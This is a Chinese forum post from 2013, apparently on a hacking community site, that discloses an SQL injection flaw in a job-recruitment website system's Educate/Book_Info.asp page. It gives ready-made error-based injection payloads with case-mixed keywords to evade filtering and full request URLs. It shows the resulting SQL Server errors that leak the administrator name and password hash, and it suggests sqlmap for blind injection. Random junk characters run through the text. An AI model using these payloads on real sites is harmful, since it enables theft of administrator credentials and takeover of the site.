找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2196|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp 8 t3 j! t' x" s) B
" P0 @7 g; m( n
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出# H2 L% J  N& U  r
8 t0 N) l2 f" x6 i, U6 Q' E
exp:如下
5 z& j" U& y3 f$ w1 H' Q  \, u查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 n8 z0 N) d' D6 U
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- [2 [: l( ]8 B* j' Q

  l$ q2 f2 f* Rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)0 H, W: N1 v# d4 U1 n" F

1 y6 y" M1 o+ ~9 D/ uMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
- S8 _( y- C6 E* k, n% r7 e $ q' W8 P' M6 g
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
+ M% _. G' {! w
$ Q- v) D2 O2 ~  I% [/Educate/Book_Info.asp,行 8
4 ^, s$ F$ @: F' [) j) n  u6 W
! `( J& l% n9 Dhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& t) |- b$ P9 p3 E , ^! M* ~7 l/ h# O
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 ^$ o/ o2 I) c' {. K . D6 }9 I! \4 ?# ~3 Q! u% V
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。" I2 K0 H' i+ n( S

4 s$ h" c" f8 E1 K  F2 T/Educate/Book_Info.asp,行 8
6 O. G9 L5 d1 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表